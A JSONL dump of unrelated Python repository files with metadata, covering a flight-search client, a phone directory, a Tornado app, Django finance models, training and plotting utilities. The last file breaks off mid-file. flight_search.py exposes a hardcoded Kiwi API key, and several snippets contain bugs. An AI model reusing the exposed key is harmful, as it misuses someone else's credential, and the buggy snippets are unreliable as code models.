total_brl += float(coin[\"brl_value\"])\n return total_usd, total_brl\n\n\ndef create_new_portfolio() -> None:\n \"\"\"\n It's only called if the program is being run for the first\n time in a system or if the portfolio file was deleted\n :return: None\n \"\"\"\n fieldnames: List[str] = [\"id\", \"ticker\", \"amount\"]\n with open(\"portfolio.csv\", \"w\") as writefile:\n writer = csv.DictWriter(writefile, fieldnames=fieldnames)\n writer.writeheader()\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fredericomozzato/crypto_tracker","sub_path":"funcs_v2.py","file_name":"funcs_v2.py","file_ext":"py","file_size_in_byte":8859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74210489367","text":"import requests\nfrom datetime import date, timedelta\nfrom flight_data import FlightData\n\nKIWI_API_IAA_CODE_ENDPOINT = 'https://api.tequila.kiwi.com/locations/query'\nKIWI_API_SEARCH_ENDPOINT = 'https://api.tequila.kiwi.com/v2/search'\nKIWI_API_KEY = 'gryfKhvGE1iCSEdVE69ev48vrJ3qaGG7'\n\n\nclass FlightSearch:\n \"\"\"\n This class is responsible for communicating to the Flight Search API.\n \"\"\"\n\n def __init__(self, city_name):\n self.city_name = city_name\n self.kiwi_api_header = {\n 'apikey': KIWI_API_KEY\n }\n\n def get_city_iata_code(self, city_name):\n \"\"\"\n This function is responsible for fetching the IATA Code for the City based on the city name passed.\n :param city_name: The name of the city passed.\n :return: str\n \"\"\"\n\n kiwi_api_parameters = {\n 'term': city_name\n }\n api_response = requests.get(url=KIWI_API_IAA_CODE_ENDPOINT,\n params=kiwi_api_parameters,\n headers=self.kiwi_api_header)\n\n return api_response.json()['locations'][0]['code']\n\n def search_flights(self, destination_iata_code):\n \"\"\"\n\n :return:\n \"\"\"\n\n departure_date, date_after_six_months = date.today(), date.today() + timedelta(days=180)\n departure_date = departure_date.strftime(\"%d/%m/%G\")\n date_after_six_months = date_after_six_months.strftime(\"%d/%m/%G\")\n\n api_parameters = {\n 'fly_from': 'YYZ',\n 'fly_to': destination_iata_code,\n 'date_from': departure_date,\n 'date_to': date_after_six_months,\n 'curr': 'CAD'\n }\n\n flight_search_api_response = requests.get(url=KIWI_API_SEARCH_ENDPOINT,\n headers=self.kiwi_api_header,\n params=api_parameters)\n\n flight_details = flight_search_api_response.json()['data']\n print(flight_details[0]['price'])\n all_flight_data = FlightData(price=flight_details[0]['price'],\n departure_city=flight_details['route'][0]['cityFrom'],\n departure_airport_code=flight_details['route'][0]['flyFrom'],\n arrival_city=flight_details['route'][0]['cityTo'],\n arrival_airport_code=flight_details['route'][0]['route']['flyTo'],\n departure_date=flight_details['route'][0]['local_departure'].split('T')[0],\n date_after_six_months=flight_details['route'][1]['local_departure'].split('T')[0])\n\n # details = (f\"Price: {flight_details[0]['price']} CAD.\"\n # f\"Departure City: {flight_details[0]['cityFrom']}\"\n # f\"Departure Airport Code: {flight_details[0]['flyFrom']}\"\n # f\"Arrival City: {flight_details[0]['cityTo']}\"\n # f\"Arrival Airport Code: {flight_details[0]['flyTo']}\"\n # f\"Departure Date: {flight_details[0]['local_departure'].split('T')}\"\n # f\"Arrival Date: {flight_details[0]['local_arrival'].split('T')}\")\n\n return all_flight_data\n","repo_name":"Clandoor/CheapFlightFinder","sub_path":"flight_search.py","file_name":"flight_search.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37485979192","text":"from os import name,system\r\nimport datetime\r\n\r\ndef clear():\r\n if name == 'nt':\r\n _ = system('clear')\r\n else:\r\n _ = system('cls')\r\n\r\nclass Phone:\r\n\r\n # Constructor of Class\r\n # name is clue of direcotoy name\r\n # name_list is used for store person name in list ..\r\n # add_phone_number is used for store number and name dictionary \r\n\r\n\r\n def __init__(self,name,name_list):\r\n self.name=name\r\n self.name_list=name_list\r\n self.add_phone_number={} \r\n\r\n # data_file FUNCTION is used for parsed data in file and store in add_phone_number {}\r\n\r\n def data_file(self,file1):\r\n with open(file1) as f:\r\n lines=f.readlines()\r\n if lines==[] :\r\n pass\r\n else:\r\n for line in lines:\r\n parsed=line.split(',')\r\n self.add_phone_number.update({int(parsed[0].strip()) : parsed[1].strip()})\r\n self.name_list.append(parsed[1].strip())\r\n\r\n # data_store_file FUNCTION is used for store data in file \r\n \r\n def data_store_file(self,number,name):\r\n with open('telephone.txt','a')as fw:\r\n fw.write(f\"{number},{name}\\n\")\r\n\r\n\r\n # delete_data_in_file FUNCTION is used for delete data in file\r\n\r\n def delete_data_in_file(self,number): \r\n import os\r\n new_file_store_data={}\r\n with open('telephone.txt','r') as fd:\r\n lines=fd.readlines()\r\n for line in lines:\r\n line1=line.split(',')\r\n # print(line)\r\n # if line1[0]!=str(number):\r\n if str(number) not in line1:\r\n new_file_store_data.update({line1[0]:line1[1]})\r\n else:\r\n # print('wHAT hAPPENS WITH mE ?')\r\n pass\r\n\r\n os.remove('telephone.txt')\r\n with open('telephone.txt','a') as fw:\r\n for num,name in new_file_store_data.items():\r\n fw.write(f\"{num},{name}\")\r\n\r\n \r\n \r\n # display_phone_numbers FUNCTION is used for display all contact in phone directory\r\n\r\n def display_phone_numbers(self):\r\n if self.add_phone_number=={}:\r\n print('\\t\\tEMPTY')\r\n print('\\n\\t','-'*59)\r\n print('\\t\\t\\tPerson Name\\t | \\tPhone Number')\r\n j=1\r\n for key,value in self.add_phone_number.items():\r\n print('\\t','-'*59)\r\n print(f\"\\t{j} | \\t\\t{value}\\t | \\t0{key}\\t |\")\r\n j+=1\r\n print('\\t','-'*59)\r\n\r\n # addition_number FUNCTION is used for save number add_phone_number and data_store_file\r\n\r\n def addition_number(self,number,name):\r\n if number not in self.add_phone_number.keys():\r\n self.name_list.append(name)\r\n self.add_phone_number.update({number : name})\r\n self.data_store_file(number,name)\r\n print('\\t\\tNumber store in database successfully .')\r\n else:\r\n print(f'\\t\\tThis {number} already exits by {self.add_phone_number[number]}')\r\n\r\n # remove_number FUNCTION is used for delete contact from file and add_phone_number \r\n\r\n def remove_number(self,number):\r\n if number in self.add_phone_number.keys():\r\n self.name_list.remove(self.add_phone_number[number])\r\n self.add_phone_number.pop(number)\r\n self.delete_data_in_file(number)\r\n print('\\t\\tThe number deleted successfully .')\r\n else:\r\n print(f\"\\t\\tThis number not in phone directory . Please chech your number..\")\r\n\r\n # search_number is used for search number in phone directory \r\n\r\n def search_number(self,number):\r\n if self.add_phone_number=={}:\r\n print('\\t\\tEMPTY')\r\n\r\n elif number in self.add_phone_number.keys():\r\n print(f\"\\t\\tThis number exit in phone directory with name {self.add_phone_number[number]}\")\r\n else:\r\n print('\\t\\tThis phone number not exit in phone directory . please check your number..')\r\n\r\n # search_name is used for search name in phone directory \r\n\r\n def search_name(self,name):\r\n if self.add_phone_number=={}:\r\n print('\\t\\tEMPTY')\r\n\r\n elif name in self.name_list:\r\n # print('\\t\\tThis name exit in phone directory .')\r\n j=1\r\n for key,value in self.add_phone_number.items():\r\n if name==value:\r\n print(f\"\\t\\t{j} . {value} ------ 0{key}\")\r\n j+=1\r\n else:\r\n print('\\t\\tThis name not exit in phone directory .')\r\n\r\n\r\n # display_name is used for display all name in phone directory \r\n\r\n def display_name(self):\r\n if self.name_list==[]:\r\n print('\\t\\tEMPTY')\r\n j=1\r\n for name in self.name_list:\r\n print(f\"\\t\\t{j} . {name}\")\r\n j+=1\r\n \r\n\r\nif __name__ == \"__main__\":\r\n phone_obj=Phone(\"Welcome To Haider's Phone Directory\",[])\r\n phone_obj.data_file('telephone.txt')\r\n\r\n\r\n print(f'\\n\\n\\n\\t\\t\\t\\t\\t\\t\\t{phone_obj.name}\\n\\n')\r\n print('\\t1 . Display All Contacts In Directory\\t\\t2 . Add Contact In Directory\\t\\t3 . Remove Number In Contact\\n\\n\\t4 . Search Number In Directory By Number\\t5 . Search Contact In Directory By Name\\t 6 .Display All Contact In Directory\\n\\n\\t\\t\\t\\t\\t\\t\\t7 . For Exit The Programme')\r\n print('\\n\\n\\n')\r\n\r\n\r\n # print('\\n\\n\\t\\t\\t\\t\\tPHONE DIRECTORY ...\\n\\n')\r\n # print('\\t\\t\\t\\t1 . Display all Contacts in Directory .')\r\n # print('\\t\\t\\t\\t2 . Add Contact in Directory .')\r\n # print('\\t\\t\\t\\t3 . Remove Contact from Directory .')\r\n # print('\\t\\t\\t\\t4 . Search Contact in Directory by number .')\r\n # print('\\t\\t\\t\\t5 . Search Contact in Directory by name .')\r\n # print('\\t\\t\\t\\t6 . Display all name in Directory .')\r\n # print('\\t\\t\\t\\t7 . For exit the programe .\\n\\n')\r\n\r\n\r\n\r\n while True:\r\n # print(f'\\n\\n\\n\\t\\t\\t\\t\\t\\t\\t{phone_obj.name}\\n\\n')\r\n # print('\\t1 . Display All Contacts In Directory\\t\\t2 . Add Contact In Directory\\t\\t3 . Remove Number In Contact\\n\\n\\t4 . Search Number In Directory By Number\\t5 . Search Contact In Directory By Name\\t 6 .Display All Contact In Directory\\n\\n\\t\\t\\t\\t\\t\\t\\t7 . For Exit The Programme\\n\\n\\n\\n')\r\n choice=input('Enter Command For Phone Directory : ').strip()\r\n if choice=='1':\r\n phone_obj.display_phone_numbers()\r\n elif choice=='2':\r\n number=input('Please enter a number :').strip().title()\r\n name=input('Plese enter your name :').strip().title()\r\n try:\r\n number1=int(number)\r\n except Exception as e:\r\n print('\\t\\tYour number is not defined please enter in digits....')\r\n else:\r\n if name.isnumeric() or name.isspace() or name=='':\r\n print('\\t\\tNumbers are not allowed in name ....')\r\n else:\r\n total=''\r\n for i in name:\r\n if i.isalpha() or i.isspace():\r\n total+=i\r\n else:\r\n break\r\n if len(name)==len(total):\r\n phone_obj.addition_number(number1,name)\r\n else:\r\n print('\\t\\tNumbers are not allowed in name ...')\r\n\r\n elif choice=='3':\r\n number=input('Enter a number that you want delete : ').strip()\r\n try:\r\n number1=int(number)\r\n except Exception as e:\r\n print('\\t\\tYour number is not defined in digits .....')\r\n else:\r\n phone_obj.remove_number(number1)\r\n \r\n elif choice=='4':\r\n number=input('Please enter a number for search ...').strip()\r\n try:\r\n number1=int(number)\r\n phone_obj.search_number(number1)\r\n except Exception as e:\r\n print('\\t\\tYour number is not defined in alphabets .....')\r\n elif choice=='5':\r\n name=input('Please enter name for search :').strip().title()\r\n try:\r\n name = str(name)\r\n except Exception as e:\r\n print('\\t\\tOnly alphabets are allowed in name ...')\r\n else:\r\n if name.isnumeric() or name.isspace() or name=='':\r\n print('\\t\\tYour name is not defined please check it ....')\r\n else:\r\n total=''\r\n for i in name:\r\n if i.isalpha() or i.isspace():\r\n total+=i\r\n else:\r\n break\r\n if len(name)==len(total):\r\n phone_obj.search_name(name)\r\n else:\r\n print('\\t\\tNumbers are not allowed in name ...')\r\n elif choice=='6':\r\n phone_obj.display_name()\r\n elif choice=='7'or choice=='q':\r\n exit()\r\n else:\r\n print(\"Some Thing Went Wrong In Your Choice Please Give Me Right Options In Given Below !\")\r\n\r\n ","repo_name":"Hayder7Aly/Telephone-Directory","sub_path":"telephone_dict.py","file_name":"telephone_dict.py","file_ext":"py","file_size_in_byte":9176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4646475335","text":"# ## Matplotlib: publication quality plots\r\n# * Provides capabilities for plotting similar to Matlab\r\n# * Interactive and animated figures\r\n# * Posibility for LaTeX rendering for improved quality\r\n# * Most other plotting libraries rely on Matplotlib or use a similar syntax\r\n#\r\n\r\n# ### The pyplot sub-module is the most useful for us\r\n\r\nimport matplotlib.pyplot as plt # import as an alias for easier typing.\r\n\r\nimport numpy as np\r\n# ## Let's make a simple parabola plot\r\n\r\nx = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\r\ny = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100, 121, 144, 169, 196, 225]\r\n\r\nfig, ax = plt.subplots()\r\nax.set_xlabel('X axis')\r\nax.set_ylabel('Y axis')\r\nax.set_title('Parabola')\r\nax.plot(x, y)\r\n\r\n# ## Customize your plots\r\n\r\n# Use LaTeX fonts:\r\nplt.style.use({'font.family': 'STIXGeneral',\r\n 'font.serif': 'Computer Modern',\r\n 'font.sans-serif': 'Computer Modern Sans serif', })\r\n\r\ny_noisy = np.random.normal(y, 5) # create some noisy data to simulate the experimental points\r\n\r\n# create a new plot\r\nfig2, ax2 = plt.subplots()\r\nax2.set_xlabel('X axis')\r\nax2.set_ylabel('Y axis')\r\nax2.plot(x, y, label='2nd order polynomial')\r\nax2.plot(x, y_noisy, 'rd--', label='Experimental points', alpha=0.5)\r\nax2.grid()\r\nax2.set_xlim([0, 10])\r\nax2.set_ylim([0, 125])\r\nax2.legend()\r\nfig2.savefig('figure.png')\r\n","repo_name":"DimensionLab/vki-course","sub_path":"Presentations/Lecture_03/Examples/matplotlib_examples_part1.py","file_name":"matplotlib_examples_part1.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"70800534487","text":"import joblib\nimport logging\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport typing as t\nfrom collections import OrderedDict\nfrom python_file.practice.deep_learning.test_learning_technique import *\n\nlogging.basicConfig(level=logging.INFO)\n\n# ニューラルネットワークの学習を行うクラス\nclass Trainer:\n def __init__(\n self,\n network,\n x_train,\n t_train,\n x_test,\n t_test,\n epoch_num=20,\n batch_size=100,\n optimizer=\"sgd\",\n optimizer_param={\"lr\": 0.01},\n evaluate_sample_num_per_epoch=None, \n verbose=True,\n ):\n self.network = network\n self.x_train = x_train\n self.t_train = t_train\n self.x_test = x_test\n self.t_test = t_test\n self.verbose = verbose\n self.epoch_num = epoch_num\n self.batch_size = batch_size\n self.evaluate_sample_num_per_epoch = evaluate_sample_num_per_epoch\n\n # パラメータ更新時の手法\n optimizer_class_dict = {\n 'sgd': SGD,\n 'momentum': Momentum,\n 'adagrad': AdaGrad\n } \n\n self.optimizer = optimizer_class_dict[optimizer](**optimizer_param)\n self.train_size = x_train.shape[0] # 入力データ数(全画像枚数)\n self.iter_per_epoch = max(self.train_size / batch_size, 1) # 全学習データを何回のバッチで網羅できるか \n self.max_iter = int(epoch_num * self.iter_per_epoch) # イテレーション数\n self.current_iter = 0\n self.current_epoch = 0\n self.train_loss_list = []\n self.train_acc_list = []\n self.test_acc_list = []\n\n def train(self):\n for i in range(self.max_iter):\n self.train_step() # イテレーション数だけ学習を行う。\n\n test_acc = self.network.accuracy(self.x_test, self.t_test)\n logging.info(f'=============== Final Test Accuracy : {test_acc}===============')\n\n \n def train_step(self):\n batch_mask = np.random.choice(self.train_size, self.batch_size)\n x_train_batch = self.x_train[batch_mask]\n t_train_batch = self.t_train[batch_mask]\n\n grads = self.network.gradient(x_train_batch, t_train_batch)\n\n self.optimizer.update(self.network.params, grads)\n\n loss = self.network.loss(x_train_batch, t_train_batch)\n self.train_loss_list.append(loss)\n\n # 特定のイテレーションにおいて評価を行う\n if self.current_iter % self.iter_per_epoch == 0:\n self.current_epoch += 1\n # 全データ\n x_train_sample, t_train_sample = self.x_train, self.t_train\n x_test_sample, t_test_sample = self.x_test, self.t_test\n # 1epoch毎に評価を行う場合\n if not self.evaluate_sample_num_per_epoch is None:\n t = self.evaluate_sample_num_per_epoch\n x_train_sample, t_train_sample = self.x_train[:t], self.t_train[:t]\n x_test_sample, t_test_sample = self.x_test[:t], self.t_test[:t]\n\n train_acc = self.network.accuracy(x_train_sample, t_train_sample)\n test_acc = self.network.accuracy(x_test_sample, t_test_sample)\n self.train_acc_list.append(train_acc)\n self.test_acc_list.append(test_acc)\n\n logging.info(f\"=== epoch: {self.current_epoch}, train acc: {train_acc}, test acc: {test_acc} ===\")\n self.current_iter += 1\n","repo_name":"ueda-hiroyuki/machine_learning","sub_path":"app/src/python_file/practice/deep_learning/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27046562551","text":"from yahooquery import Ticker\n\n\nclass YahooQuery:\n\n def __init__(self, symbols):\n\n self.symbols_info = []\n for symbol in symbols:\n if symbol.isalpha():\n info = Ticker(symbol)\n else:\n info = Ticker(symbol + \".T\")\n self.symbols_info.append(info)\n\n def get_valuation_measures(self):\n\n try:\n subsets = []\n for info in self.symbols_info:\n\n # 財務諸表を取得\n valuation_measures = info.valuation_measures\n\n # 行と列を入れ替えたDataFrameを作成\n valuation_measures_t = valuation_measures.T\n #\n # 目的の列のみを抽出\n try:\n subset_v = valuation_measures_t.loc[[\n 'asOfDate', 'periodType', 'PbRatio', 'PeRatio', 'MarketCap']]\n except:\n try:\n subset_v = valuation_measures_t.loc[[\n 'asOfDate', 'periodType', 'PbRatio', 'MarketCap']]\n except:\n subset_v = valuation_measures_t.loc[[\n 'asOfDate', 'periodType', 'MarketCap']]\n\n\n subset_v_t = subset_v.T\n # subset_v_t = subset_v_t.loc[subset_v_t['periodType'] == '3M'].copy()\n subset_v_t['symbol'] = valuation_measures_t.columns[0].replace(\".T\",\"\") # 証券コードを列 'symbol' に追加\n subsets.append(subset_v_t)\n\n except Exception as e:\n print(\"get_valuation_measures\")\n print(e)\n return subsets\n\n def get_income_statement(self):\n\n subsets = []\n try:\n for info in self.symbols_info:\n # yahooqueryでTickerオブジェクトを作成\n\n # 財務諸表を取得\n income_statement = info.income_statement()\n\n # 行と列を入れ替えたDataFrameを作成\n income_statement_t = income_statement.T\n #\n # 目的の列のみを抽出\n try:\n subset_v = income_statement_t.loc[[\n 'asOfDate', 'periodType', 'TotalOperatingIncomeAsReported', 'TotalRevenue']]\n except:\n subset_v = income_statement_t.loc[[\n 'asOfDate', 'periodType', 'TotalRevenue']]\n\n subset_v_t = subset_v.T\n # subset_v_t = subset_v_t.loc[subset_v_t['periodType'] == '12M'].copy()\n subset_v_t['symbol'] = income_statement_t.columns[0].replace(\".T\",\"\") # 証券コードを列 'symbol' に追加\n subsets.append(subset_v_t)\n\n except Exception as e:\n print(\"get_income_statement\")\n print(e) \n\n return subsets","repo_name":"Naoki0618/Streamlit","sub_path":"API/yahoo_query.py","file_name":"yahoo_query.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2793046422","text":"import math\r\nfrom mmcv.runner.hooks import HOOKS, LrUpdaterHook\r\n\r\n\r\n@HOOKS.register_module()\r\nclass ReduceOnPlateauLrUpdaterHook(LrUpdaterHook):\r\n\r\n \"\"\"\r\n\r\n Must be used together with EvalHook or DistEvalHook with save_best not being None.\r\n EvalHook saves best checkpoint's evaluation score and file path\r\n in ``runner.meta['hook_msgs']`` when the save_best is set.\r\n\r\n \"\"\"\r\n\r\n def __init__(self, factor=0.5, min_lr=5e-7, patience=3, **kwargs):\r\n self.factor = factor\r\n self.num_updates = 0\r\n self.min_lr = min_lr\r\n self.patience = patience\r\n self.no_optim = 0\r\n self.score = None\r\n super().__init__(**kwargs)\r\n\r\n def get_lr(self, runner, base_lr):\r\n if runner.meta is None:\r\n return base_lr\r\n\r\n msgs = runner.meta.get(\"hook_msgs\", None)\r\n if msgs is None:\r\n return base_lr\r\n\r\n best_score = msgs.get(\"best_score\", None)\r\n best_ckpt = msgs.get(\"best_ckpt\", None)\r\n\r\n if best_score is None or best_ckpt is None:\r\n pass\r\n elif self.score is None:\r\n self.score = best_score\r\n elif self.score == best_score:\r\n self.no_optim += 1\r\n if self.no_optim > self.patience:\r\n runner.load_checkpoint(best_ckpt)\r\n self.no_optim = 0\r\n self.num_updates += 1\r\n runner.logger.info(\r\n f'Reduce lr by a factor of {self.factor} and load model from the last best checkpoint.')\r\n else:\r\n self.score = best_score\r\n self.no_optim = 0\r\n\r\n lr = base_lr * math.pow(self.factor, self.num_updates)\r\n if self.min_lr is not None:\r\n lr = max(lr, self.min_lr)\r\n\r\n return lr\r\n\r\n\r\n","repo_name":"CAU-HE/CMCDNet","sub_path":"mmseg/core/hooks/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"33126624287","text":"# _*_ coding: utf-8 _*_\r\n'''\r\nwindows下使用gbk编码\r\n'''\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('gbk')\r\n\r\nimport os.path\r\n\r\nimport tornado.httpserver\r\nimport tornado.ioloop\r\nimport tornado.options\r\nimport tornado.web\r\nfrom tornado.options import define, options\r\n\r\ndefine('port', default=8000, help='run on the given port', type=int)\r\n\r\n\r\nclass IndexHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('index.html')\r\n\r\n\r\nclass GradeHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('grade.html', g1='', g2='', g3='', g4='',g5='', g6='', g7='', g8='', g9='',g10='', g11='', g12='')\r\n\r\n def post(self):\r\n for i in xrange(1, 13):\r\n # locals()['name%s'%i] = self.get_argument('name%s'%i)\r\n\r\n locals()['grade%s' % i] = self.get_argument('grade%s' % i)\r\n\r\n self.render('grade.html', g1=eval('grade1'), g2=eval('grade2'), g3=eval('grade3'), g4=eval('grade4'),\r\n g5=eval('grade5'), g6=eval('grade6'), g7=eval('grade7'), g8=eval('grade8'), g9=eval('grade9'),\r\n g10=eval('grade10'), g11=eval('grade11'), g12=eval('grade12'))\r\n\r\n\r\n# class ChartModule(tornado.web.UIModule):\r\nclass LogHandler(tornado.web.RequestHandler):\r\n def post(self):\r\n title = self.get_argument('title')\r\n article = self.get_argument('article')\r\n self.render('log.html', title=title, article=article)\r\n\r\n\r\nif __name__ == '__main__':\r\n tornado.options.parse_command_line()\r\n app = tornado.web.Application(\r\n handlers=[(r'/', IndexHandler), (r'/grade', GradeHandler), (r'/log', LogHandler)],\r\n template_path=os.path.join(os.path.dirname(__file__), 'templates'),\r\n static_path=os.path.join(os.path.dirname(__file__), 'static')\r\n\r\n )\r\nhttp_server = tornado.httpserver.HTTPServer(app)\r\nhttp_server.listen(options.port)\r\ntornado.ioloop.IOLoop.instance().start()\r\n","repo_name":"dpj514/practice-website","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"572892661","text":"from django.conf import settings\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db import models\n\n\nclass TimestampModel(models.Model):\n created_at = models.DateTimeField(\n auto_now_add=True,\n verbose_name=_(\"luotu\"),\n )\n \n class Meta: \n abstract =True\n\nclass OwnedModel(models.Model):\n owner = models.ForeignKey(\n settings.AUTH_USER_MODEL, \n on_delete=models.CASCADE,\n verbose_name=_(\"omistaja\"))\n \n class Meta: \n abstract =True\n\n\n\n\nclass Document(TimestampModel, OwnedModel):\n class Type(models.TextChoices):\n #KOODi_NIMI = (\"Tietokantaan TLENNTTAVA\", _(\"Käyttäjälle näkyvä\"))\n BILL = (\"BILL\", _(\"Lasku\"))\n RECEIPT = (\"RECEIPT\", _(\"Kuitti\"))\n CALCULATION = (\"CALCULATION\", _(\"Laskelma\"))\n OTHER = (\"OTHER\", _(\"Muu\"))\n\n type = models.CharField(\n max_length=20,\n choices=Type.choices,\n verbose_name=_(\"tyyppi\"),\n )\n name = models.CharField(\n max_length=100, \n blank=True,\n verbose_name=_(\"nimi\"),\n )\n file = models.FileField(\n upload_to=\"docs/%Y-%m/\",\n verbose_name=_(\"tiedosto\"),\n )\n \n class Meta:\n verbose_name=_(\"dokumentti\")\n verbose_name_plural=_(\"dokumentit\")\n\n def __str__(self):\n return self.name if self.name else f\"Document {self.id}\"\n \n\n\nclass Category(TimestampModel,OwnedModel):\n name =models.CharField(\n max_length=100,\n verbose_name=_(\"nimi\"),\n )\n parent = models.ForeignKey(\n \"self\",\n blank=True,\n null=True,\n related_name=\"subcategories\",\n on_delete=models.CASCADE,\n verbose_name=_(\"yläkategoria\"),\n )\n\n class Meta:\n verbose_name=_(\"kategoria\")\n verbose_name_plural=_(\"kategoriat\")\n \n def __str__(self):\n prefix = f\"{self.parent} / \" if self.parent else \"\"\n return f\"{prefix}{self.name}\"\n\nclass Account(TimestampModel,OwnedModel):\n name =models.CharField(\n max_length=100,\n )\n bank_account =models.CharField(max_length=50, null =True, blank=True)\n\n def __str__(self):\n return f\"{self.id:04d} {self.name}\"\n \n\nclass Transaction(TimestampModel):\n class Type(models.TextChoices):\n INCOME = (\"INCOME\", _(\"Tulo\"))\n EXPENSE = (\"EXPENSE\", _(\"Meno\"))\n\n class State(models.TextChoices):\n UPCOMING = (\"UPCOMING\", _(\"Tuleva\"))\n DONE = (\"DONE\", _(\"Tapahtunut\"))\n\n account = models.ForeignKey(Account, on_delete=models.RESTRICT)\n type = models.CharField(max_length=20, choices=Type.choices)\n state = models.CharField(max_length=20, choices=State.choices)\n date = models.DateField()\n amount = models.DecimalField(max_digits=20, decimal_places=2)\n category= models.ForeignKey(Category, null=True, blank=True, on_delete=models.SET_NULL)\n documents = models.ManyToManyField(Document, related_name=\"transactions\", blank=True,)\n\n documents = models.ManyToManyField(\n Document, \n related_name=\"transactions\",\n blank=True,\n )\n\n def __str__(self):\n return f\"{self.date} {self.account} {self.amount} ({self.state})\"\n\n \n \n ","repo_name":"dildorababaerova/django-meenot","sub_path":"moneyflow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1456597930","text":"def sum_p(a,b,c):\n sum=int(a+b+c)\n if(sum<21):\n return sum\n else:\n sum=sum-10\n if(sum<21):\n return sum\n else:\n return 0\nt=int(input())\nwhile(t>0):\n t-=1\n a=int(input())\n b=int(input())\n c=int(input())\n if(sum_p(a,b,c)==0):\n print(\"blackjack\", \"[(\", a,b,c, \")]\", \"--> blast\")\n else:\n print(\"blackjack\", \"[(\", a, b, c, \")]\", \"-->\",sum_p(a,b,c))","repo_name":"tanisha1244/cyber-security","sub_path":"assignment 3/3_6.py","file_name":"3_6.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72957854168","text":"from Traduccion.Tipos import *\nfrom Traduccion.Abstracta import abst\nfrom Traduccion.Valores import *\nfrom Traduccion.Variables import variables\nfrom Traduccion.Primitivos import Primitivo\nfrom Errores import *\n\nclass Op_logica(abst):\n def __init__(self, dato1, dato2, operacion, fila, columna):\n self.dato1 = dato1\n self.dato2 = dato2\n self.operacion = operacion\n self.fila = fila\n self.columna = columna\n\n\n def verificar_tipo(self, ambito_actual):\n tipo1 = self.dato1.verificar_tipo(ambito_actual)\n tipo2 = self.dato2.verificar_tipo(ambito_actual)\n\n if tipo1 == Tipo_dato.ENTERO:\n if tipo2 == Tipo_dato.ENTERO:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.DECIMAL:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.CARACTER:\n return Tipo_dato.ENTERO\n else:\n print(\"ERROR: No se puden comparar INT con CADENAS\")\n Err = Error(\"Operacoin Logica\", \"Semantico\", \"No se pueden comparar int con cadena\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n elif tipo1 == Tipo_dato.DECIMAL:\n if tipo2 == Tipo_dato.ENTERO:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.DECIMAL:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.CARACTER:\n return Tipo_dato.ENTERO\n else:\n print(\"ERROR: No se puden comparar DECIMALES con CADENAS\")\n Err = Error(\"Operacion Logica\", \"Semantico\", \"No se pueden comparar decimales con cadenas\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n elif tipo1 == Tipo_dato.CARACTER:\n if tipo2 == Tipo_dato.ENTERO:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.DECIMAL:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.CARACTER:\n return Tipo_dato.ENTERO\n else:\n print(\"ERROR: No se puden comparar Caracteres con CADENAS\")\n Err = Error(\"Operacoin Logica\", \"Semantico\", \"No se pueden comparar Caracteres con Cadenas\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n\n elif tipo1 == Tipo_dato.CADENA:\n if tipo2 == Tipo_dato.CADENA:\n return Tipo_dato.ENTERO\n else:\n Err = Error(\"Operacoin logica\", \"Semantico\", \"Solo se pueden comparar cadenas con cadenas\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n else:\n return False\n\n def generar_C3D(self, tipo_A = None):#(self, tipo_A)\n augus = \"\"\n dato1 = []\n dato2 = []\n if isinstance(self.dato1, variables):\n dato1 = self.dato1.generar_C3D(tipo_A)\n tipo1 = self.dato1.get_tipo(tipo_A)\n elif isinstance(self.dato1, Primitivo):\n tipo1 = self.dato1.get_tipo()\n if (tipo1 != False and tipo1 == Tipo_dato.ENTERO) or (tipo1 != False and tipo1 == Tipo_dato.DECIMAL):\n dato1 = self.dato1.generar_C3D(tipo_A)\n elif tipo1 != False and tipo1 == Tipo_dato.CARACTER:\n dato1 = self.dato1.generar_C3D(Tipo_dato.ENTERO)\n else:\n dato1 = self.dato1.generar_C3D(tipo_A)\n else:\n dato1 = self.dato1.generar_C3D(tipo_A)\n\n if isinstance(self.dato2, variables):\n dato2 = self.dato2.generar_C3D(tipo_A)\n tipo2 = self.dato2.get_tipo(tipo_A)\n elif isinstance(self.dato2, 